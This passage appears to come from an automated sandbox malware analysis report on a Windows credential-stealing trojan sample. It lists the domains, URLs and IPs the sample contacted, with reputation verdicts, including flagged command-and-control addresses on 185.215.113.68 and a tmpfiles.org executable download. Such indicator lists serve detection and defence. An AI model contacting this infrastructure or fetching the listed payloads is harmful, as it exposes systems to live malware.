prod.content-signature-chains.prod.webservices.mozgcp.net	34.160.144.191	true	false	unknown
scontent.xx.fbcdn.net	157.240.241.1	true	false	high
us-west1.prod.sumo.prod.webservices.mozgcp.net	34.149.128.2	true	false	unknown
ipv4only.arpa	192.0.0.170	true	false	unknown
ipinfo.io	34.117.186.192	true	false	high
facebook.com	157.240.241.35	true	false	high
www.google.com	142.251.32.100	true	false	high
part-0012.t-0009.t-msedge.net	13.107.246.40	true	false	unknown
star-mini.c10r.facebook.com	157.240.241.35	true	false	high
prod.balrog.prod.cloudops.mozgcp.net	35.244.181.201	true	false	unknown
twitter.com	104.244.42.65	true	false	high
accounts.google.com	172.253.62.84	true	false	high
dyna.wikimedia.org	208.80.154.224	true	false	high
prod.remote-settings.prod.webservices.mozgcp.net	34.149.100.209	true	false	unknown
pki-goog.l.google.com	142.250.80.99	true	false	high
sni1gl.wpc.nucdn.net	152.195.19.97	true	false	unknown
youtube.com	142.250.72.110	true	false	high
youtube-ui.l.google.com	142.251.40.238	true	false	high
tmpfiles.org	104.21.21.16	true	false	unknown
www3.l.google.com	142.251.35.174	true	false	high
reddit.map.fastly.net	151.101.1.140	true	false	unknown
play.google.com	142.251.40.206	true	false	high
sb.scorecardresearch.com	18.238.49.99	true	false	unknown
proxyserverecs-1736642167.us-east-1.elb.amazonaws.com	54.205.248.223	true	false	high
clients.l.google.com	142.250.81.238	true	false	high
googlehosted.l.googleusercontent.com	142.250.72.97	true	false	high
telemetry-incoming.r53-2.services.mozilla.com	34.120.208.123	true	false	high
spocs.getpocket.com	unknown	unknown	false	high
clients2.googleusercontent.com	unknown	unknown	false	high
rr1---sn-q4fl6nlz.googlevideo.com	unknown	unknown	false	high
clients2.google.com	unknown	unknown	false	high
firefox.settings.services.mozilla.com	unknown	unknown	false	high
www.youtube.com	unknown	unknown	false	high
detectportal.firefox.com	unknown	unknown	false	high
bzib.nelreports.net	unknown	unknown	false	unknown
shavar.services.mozilla.com	unknown	unknown	false	high
www.reddit.com	unknown	unknown	false	high
c.msn.com	unknown	unknown	false	high
ntp.msn.com	unknown	unknown	false	high
content-signature-2.cdn.mozilla.net	unknown	unknown	false	high
support.mozilla.org	unknown	unknown	false	high
push.services.mozilla.com	unknown	unknown	false	high
rr2---sn-q4fl6nz6.googlevideo.com	unknown	unknown	false	high
browser.events.data.msn.com	unknown	unknown	false	high
clients1.google.com	unknown	unknown	false	high
www.facebook.com	unknown	unknown	false	high
assets.msn.com	unknown	unknown	false	high
static.xx.fbcdn.net	unknown	unknown	false	high
accounts.youtube.com	unknown	unknown	false	high
api.msn.com	unknown	unknown	false	high
www.wikipedia.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F	false		high
https://www.youtube.com/s/desktop/80338919/jsbin/www-i18n-constants-en_US.vflset/www-i18n-constants.js	false		high
https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3D%252Fsignin_passive%26feature%3Dpassive&hl=en-GB	false		high
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1705534522133&w=0&anoncknm=app_anon&NoResponseBody=true	false		high
https://static.xx.fbcdn.net/rsrc.php/v3/yC/r/M08arqdo_nN.js?_nc_x=Ij3Wp8lg5Kz	false		high
https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=ASKXGp2Fh1LVullqknwvfi41Bgz_cGuworpX9-qvX0psxzTFaAjKxJSIbTCzEnPsYVkspxjdHHyF&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S922877882%3A1705534476005670&theme=glif	false		high
https://static.xx.fbcdn.net/rsrc.php/v3/yN/l/0,cross/z8iN9p2rYBG.css?_nc_x=Ij3Wp8lg5Kz	false		high
https://www.google.com/favicon.ico	false		high
https://bzib.nelreports.net/api/report?cat=bingbusiness	false	Avira URL Cloud: safe	unknown
https://www.facebook.com/login	false		high
https://www.youtube.com/s/desktop/80338919/jsbin/intersection-observer.min.vflset/intersection-observer.min.js	false		high
https://www.google.com/js/th/QaMcj-JulTnv9WX-ZKiswnw1NZ6KstGU-WkCl6294a4.js	false		high
https://sb.scorecardresearch.com/b2?rn=1705534516527&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=	false	Avira URL Cloud: safe	unknown
https://tmpfiles.org/dl/3900221/setuppowergrepdemo.exe	false	Avira URL Cloud: safe	unknown
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1705534523644&w=0&anoncknm=app_anon&NoResponseBody=true	false		high
https://static.xx.fbcdn.net/rsrc.php/v3/yz/r/lFK_RCKM9IT.js?_nc_x=Ij3Wp8lg5Kz	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.youtube.com/img/desktop/yt_1200.png	places.sqlite-wal.51.dr	false		high
https://basket.mozilla.org/news/subscribe_sms/	scriptCache-child-new.bin.51.dr	false		high
https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-	firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	false		high
https://firefox.settings.services.mozilla.com/v1#	firefox.exe, 00000031.00000003.2697145156.00000203444BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.4742743871.00000203444BB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://detectportal.firefox.com/	firefox.exe, 00000033.00000003.2640276526.0000026F4F8BF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://services.addons.mozilla.org	firefox.exe, 00000033.00000003.2901112788.0000026F4AAF7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%	firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	false		high
http://185.215.113.68/mine/amer.exeshCore	RegAsm.exe, 00000002.00000002.2596470514.000000000157F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://csp.withgoogle.com/csp/report-to/youtube-main-app-web-scs-key	firefox.exe, 00000033.00000003.2994770537.0000026F5DBE1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mozilla.com0	firefox.exe, 00000033.00000003.2821250814.0000026F4CB8B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2832343051.0000026F50500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2821020703.0000026F4CBA8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://merino.services.mozilla.com/api/v1/suggest	firefox.exe, 00000031.00000002.4727131464.0000020338FD5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://easylist.to/)	LICENSE.36.dr	false		high
http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsusersIncIEEERootCA.cr	PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000F98000.00000040.00000001.01000000.00000009.sdmp, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000000.2273225465.00000000010BD000.00000080.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000000.2423152091.0000000000C5D000.00000080.00000001.01000000.00000010.sdmp, explorhe.exe, 0000002E.00000002.4708216186.0000000000B38000.00000040.00000001.01000000.00000010.sdmp, PXBvYMcLF9IUsaGl9axr.exe.2.dr, explorhe.exe.15.dr	false		high
http://185.215.113.68/theme/index.php#;	explorhe.exe, 0000002E.00000002.4712363155.00000000014C2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.fontbureau.com/designers	firefox.exe, 00000031.00000002.4828503772.0000020346300000.00000002.00000001.00040000.00000016.sdmp	false		high
https://ipinfo.io:443/widget/demo/154.16.192.193W	RegAsm.exe, 00000002.00000002.2596470514.0000000001573000.00000004.00000020.00020000.00000000.sdmp	false		high
https://spocs.getpocket.com/spocs	firefox.exe, 00000033.00000003.2675923428.0000026F4C799000.00000004.00000800.00020000.00000000.sdmp, D0F48A0632B6C451791F4257697E861961F06A6F.51.dr	false		high
http://185.215.113.68/theme/index.phpA;?d	explorhe.exe, 0000002E.00000003.3960844324.000000000149A000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000003.3962135406.00000000014BF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://polymer.github.io/AUTHORS.txt	firefox.exe, 00000033.00000003.2991330163.0000026F5DABB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://screenshots.firefox.com	firefox.exe, 00000033.00000003.2675923428.0000026F4C71C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2820309508.0000026F4CBB8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2815640094.0000026F4CBB8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2641907380.0000026F4CBC1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2674562682.0000026F4CBC1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.internalfb.com/intern/invariant/	chromecache_943.22.dr	false	URL Reputation: safe	unknown
https://ads.stickyadstv.com/firefox-etp	firefox.exe, 00000033.00000003.2640984970.0000026F4E9A7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2640984970.0000026F4E9CD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ipinfo.io/widget/demo/154.16.192.193#	RegAsm.exe, 00000002.00000002.2596470514.0000000001573000.00000004.00000020.00020000.00000000.sdmp	false		high
https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM	firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	false		high
https://xhr.spec.whatwg.org/#sync-warning	firefox.exe, 00000031.00000002.4753403845.0000020344896000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2632135362.0000026F525DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2632290478.0000026F525C1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.amazon.com/exec/obidos/external-search/	firefox.exe, 00000033.00000003.2509868422.0000026F4D00E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2512730909.0000026F4D051000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2508170933.0000026F4E500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2510769501.0000026F4D030000.00000004.00000800.00020000.00000000.sdmp	false		high
https://profiler.firefox.com/	firefox.exe, 00000033.00000003.2900419944.0000026F4CB66000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/DPlease	firefox.exe, 00000031.00000002.4828503772.0000020346300000.00000002.00000001.00040000.00000016.sdmp	false	URL Reputation: safe	unknown
https://s.youtube.com	firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993057754.0000026F5DBA3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://i.ytimg.com/an/	firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mozilla-services/screenshots	firefox.exe, 00000033.00000003.2509868422.0000026F4D00E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2508170933.0000026F4E500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2510769501.0000026F4D030000.00000004.00000800.00020000.00000000.sdmp	false		high
https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureRequest	firefox.exe, 00000031.00000002.4775596956.00000203450A0000.00000002.08000000.00040000.00000000.sdmp	false		high
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=panel-def	firefox.exe, 00000033.00000003.2947953057.0000026F5AD1F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://tracking-protection-issues.herokuapp.com/new	firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsing	firefox.exe, 00000033.00000003.2632135362.0000026F525DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2632290478.0000026F525C1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report	firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	false		high
http://exslt.org/common	firefox.exe, 00000031.00000002.4747190844.000002034477E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://accounts.google.com/n	3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000002.2473037584.000000000193F000.00000004.00000020.00020000.00000000.sdmp, 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000003.2362295339.000000000193F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://firefox.settings.services.mozilla.com/v1i	scriptCache-child-new.bin.51.dr	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	firefox.exe, 00000033.00000003.2642685463.0000026F4BC38000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsThe	firefox.exe, 00000031.00000002.4775596956.00000203450A0000.00000002.08000000.00040000.00000000.sdmp	false		high
http://polymer.github.io/PATENTS.txt	firefox.exe, 00000033.00000003.2991330163.0000026F5DABB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/	firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	false		high
https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabMozRequestFullSc	firefox.exe, 00000031.00000002.4780134384.0000020345355000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000003.2698788329.0000020345366000.00000004.00000800.00020000.00000000.sdmp	false		high
https://s.youtube.com/api/stats/qoe?cl=	firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	false		high
http://detectportal.firefox.comh	firefox.exe, 00000031.00000002.4780134384.00000203453BB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://exslt.org/dates-and-times	firefox.exe, 00000033.00000003.2692746712.0000026F49D66000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.68/theme/index.php%;	explorhe.exe, 0000002E.00000003.3960844324.000000000149A000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000003.3962135406.00000000014BF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://pki.goog/repository/0	2cc80dabc69f58b6_0.36.dr	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	QdX9ITDLyCRBWeb Data.2.dr	false		high
http://go.microsoft.cP	MPGPH131.exe, 00000007.00000002.2125757096.0000000000F37000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://getpocket.com/	scriptCache-child-new.bin.51.dr	false		high
https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=	D0F48A0632B6C451791F4257697E861961F06A6F.51.dr	false		high
https://searchfox.org/mozilla-central/source/toolkit/components/search/SearchUtils.jsm#145-152	firefox.exe, 00000033.00000003.2957224507.0000026F5B267000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bugzilla.mo	firefox.exe, 00000033.00000003.2540660558.0000026F4FE41000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2638535851.0000026F4FE41000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ipinfo.io/	RegAsm.exe, 00000002.00000002.2596470514.000000000152A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2596470514.000000000157F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2596470514.0000000001573000.00000004.00000020.00020000.00000000.sdmp	false		high
https://mitmdetection.services.mozilla.com/	firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	false		high
http://185.215.113.68/theme/index.phpIU)(A;OICI;FA;;;SY)j-oe	explorhe.exe, 0000002E.00000003.3960844324.000000000149A000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000003.3962135406.00000000014BF000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000002.4712363155.00000000014C2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.youtube.com/pcs/activeview?xai=	firefox.exe, 00000033.00000003.2993102927.0000026F5DB8B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://firefox.settings.services.mozilla.com/v1i#	scriptCache-child-new.bin.51.dr	false		high
http://185.215.113.68/theme/index.phpy	explorhe.exe, 0000002E.00000002.4712363155.000000000149A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://spocs.getpocket.com/	firefox.exe, 00000033.00000003.2675923428.0000026F4C799000.00000004.00000800.00020000.00000000.sdmp, D0F48A0632B6C451791F4257697E861961F06A6F.51.dr	false		high
https://www.youtube.comMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:	firefox.exe, 00000034.00000002.2672529573.000002650EEC0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://services.addons.mozilla.org/api/v4/abuse/report/addon/	firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	false		high
https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%	firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	false		high
http://185.215.113.68/theme/index.phpr	explorhe.exe, 0000002E.00000003.3960844324.000000000149A000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000003.3962135406.00000000014BF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f	firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	false		high
http://185.215.113.68/theme/index.phpt	explorhe.exe, 0000002E.00000003.3960844324.000000000149A000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000002.4712363155.000000000149A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://s.youtube.com/api/stats/watchtime?cl=	firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.allizom.troppus.	places.sqlite-wal.51.dr	false		high
http://fb.me/use-check-prop-typesG	scriptCache-child-new.bin.51.dr	false		high
http://185.215.113.68/theme/index.phpj	explorhe.exe, 0000002E.00000003.3960844324.000000000149A000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000003.3962135406.00000000014BF000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000002.4712363155.00000000014C2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://monitor.firefox.com/user/breach-stats?includeResolved=true	firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	false		high
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report	firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	false		high
http://185.215.113.68/theme/index.phpi	explorhe.exe, 0000002E.00000003.3962232462.00000000013F3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.founder.com.cn/cn/bThe	firefox.exe, 00000031.00000002.4828503772.0000020346300000.00000002.00000001.00040000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.68/theme/index.phph	explorhe.exe, 0000002E.00000002.4711406923.00000000013F4000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000003.3962232462.00000000013F3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.68/theme/index.phpc	explorhe.exe, 0000002E.00000003.3960844324.000000000149A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://fb.me/react-polyfillsP	scriptCache-child-new.bin.51.dr	false		high
http://support.google.com/accounts/answer/151657?hl=en-GB	2cc80dabc69f58b6_0.36.dr	false		high
https://fb.me/react-polyfillsO	scriptCache-child-new.bin.51.dr	false		high
http://185.215.113.68/theme/index.phpZ	explorhe.exe, 0000002E.00000003.3960844324.000000000149A000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000003.3962135406.00000000014BF000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000002.4712363155.00000000014C2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.youtube.comC:	firefox.exe, 00000026.00000002.2494708399.000002014BF00000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2671229522.000002650D090000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://csp.withgoogle.com/csp/report-to/youtube	firefox.exe, 00000033.00000003.2996055360.0000026F5DA0B000.00000004.00000800.00020000.00000000.sdmp, 70DE259D3055F51A1BEBD035A0E461EC8E9213A5.51.dr, 281D3362FC8DAA6BD8595A1C942DD405542AD365.51.dr, B41E3D0BA051DAFDC3F262CC45C5AE9165BC9508.51.dr, D550D57BCFA88C4195E78095A742FAC7693FC54F.51.dr, 48D71C745420E717A699F4CC6847C17B6C743A51.51.dr, A988D8F5B0BF56AA1942EC62AFDF51C05C82139B.51.dr, 33200725926A095B3A48EB9ABD6821C7F895DF65.51.dr, AF10D6A6EDDDEAF586DD225969745155C8322254.51.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
13.107.246.40	part-0012.t-0009.t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
194.33.191.102	unknown	unknown	20668	AQUA-ASRO	true
157.240.241.35	facebook.com	United States	32934	FACEBOOKUS	false
34.117.237.239	contile.services.mozilla.com	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
142.250.81.238	clients.l.google.com	United States	15169	GOOGLEUS	false
104.18.23.202	unknown	United States	13335	CLOUDFLARENETUS	false
109.107.182.3	unknown	Russian Federation	49973	TELEPORT-TV-ASRU	true
104.18.22.202	chrome.cloudflare-dns.com	United States	13335	CLOUDFLARENETUS	false
157.240.241.1	scontent.xx.fbcdn.net	United States	32934	FACEBOOKUS	false
13.226.34.13	unknown	United States	16509	AMAZON-02US	false
34.120.208.123	telemetry-incoming.r53-2.services.mozilla.com	United States	15169	GOOGLEUS	false
142.251.35.174	www3.l.google.com	United States	15169	GOOGLEUS	false
172.253.62.84	accounts.google.com	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.250.72.97	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
34.160.144.191	prod.content-signature-chains.prod.webservices.mozgcp.net	United States	2686	ATGS-MMD-ASUS	false
142.250.72.110	youtube.com	United States	15169	GOOGLEUS	false
142.251.32.118	unknown	United States	15169	GOOGLEUS	false
142.251.163.84	unknown	United States	15169	GOOGLEUS	false
74.125.1.166	rr1.sn-q4fl6nlz.googlevideo.com	United States	15169	GOOGLEUS	false
142.250.80.46	unknown	United States	15169	GOOGLEUS	false
34.117.186.192	ipinfo.io	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
185.215.113.68	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
152.195.19.97	sni1gl.wpc.nucdn.net	United States	15133	EDGECASTUS	false
142.251.40.110	unknown	United States	15169	GOOGLEUS	false
142.251.32.100	www.google.com	United States	15169	GOOGLEUS	false
172.217.165.150	unknown	United States	15169	GOOGLEUS	false
54.205.248.223	proxyserverecs-1736642167.us-east-1.elb.amazonaws.com	United States	14618	AMAZON-AESUS	false
142.251.16.84	unknown	United States	15169	GOOGLEUS	false
13.226.34.9	mitmdetection.services.mozilla.com	United States	16509	AMAZON-02US	false
142.250.65.214	i.ytimg.com	United States	15169	GOOGLEUS	false
173.194.191.230	unknown	United States	15169	GOOGLEUS	false
142.250.65.196	unknown	United States	15169	GOOGLEUS	false
142.250.65.195	unknown	United States	15169	GOOGLEUS	false
104.21.21.16	tmpfiles.org	United States	13335	CLOUDFLARENETUS	false
142.251.40.238	youtube-ui.l.google.com	United States	15169	GOOGLEUS	false
34.149.100.209	prod.remote-settings.prod.webservices.mozgcp.net	United States	2686	ATGS-MMD-ASUS	false
173.194.57.39	rr2.sn-q4fl6nz6.googlevideo.com	United States	15169	GOOGLEUS	false
193.233.132.62	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	true
34.107.221.82	prod.detectportal.prod.cloudops.mozgcp.net	United States	15169	GOOGLEUS	false
35.244.181.201	prod.balrog.prod.cloudops.mozgcp.net	United States	15169	GOOGLEUS	false
13.225.63.72	services.addons.mozilla.org	United States	16509	AMAZON-02US	false
142.251.35.164	unknown	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.6
127.0.0.1

General Information

Joe Sandbox version:	38.0.0 Ammolite
Analysis ID:	1376410
Start date and time:	2024-01-18 00:33:20 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 16m 0s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	55
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@160/856@163/45
EGA Information:	Successful, ratio: 57.1%
HCA Information:	Successful, ratio: 71% Number of executed functions: 85 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
